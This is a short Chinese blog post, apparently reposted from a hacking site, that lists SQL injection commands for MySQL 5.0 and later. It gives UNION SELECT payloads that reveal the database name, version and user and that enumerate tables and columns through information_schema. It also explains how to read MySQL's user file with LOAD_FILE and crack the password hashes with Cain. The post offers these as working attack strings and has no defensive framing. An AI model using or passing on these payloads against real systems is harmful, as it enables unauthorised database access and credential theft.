码迷,mamicode.com
首页 > 数据库 > 详细

MYSQL5.0以上版本注入命令 -www.hackerschina.org

时间:2014-05-08 19:00:07      阅读:360      评论:0      收藏:0      [点我收藏+]

标签:class   c   name   for   table   sql   

一.查看MYSQL基本信息(库名,版本,用户)
and 1=2 union select 1,2,3,database(),5,version(),6,user(),7..../*

二.暴表
and 1=2 union select 1,2,3,TABLE_NAME,4,5,6,7...... from information_schema.TABLES where TABLE_SCHEMA =库的HEX limit 1,1/*

三.暴字段
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7.....from information_schema.COLUMNS where TABLE_NAME=表的HEX limit 1,1/*

关于找不到ROOT密码的爆破:
通过LOAD_FILE(‘‘C:\..\MYSQL\DATA\MYSQL\USER.MYD‘‘)得到用户的HASH散列,之后用CAIN爆破....

MYSQL5.0以上版本注入命令 -www.hackerschina.org,布布扣,bubuko.com

MYSQL5.0以上版本注入命令 -www.hackerschina.org

标签:class   c   name   for   table   sql   

原文地址:http://www.cnblogs.com/Hkadmin/p/3713810.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!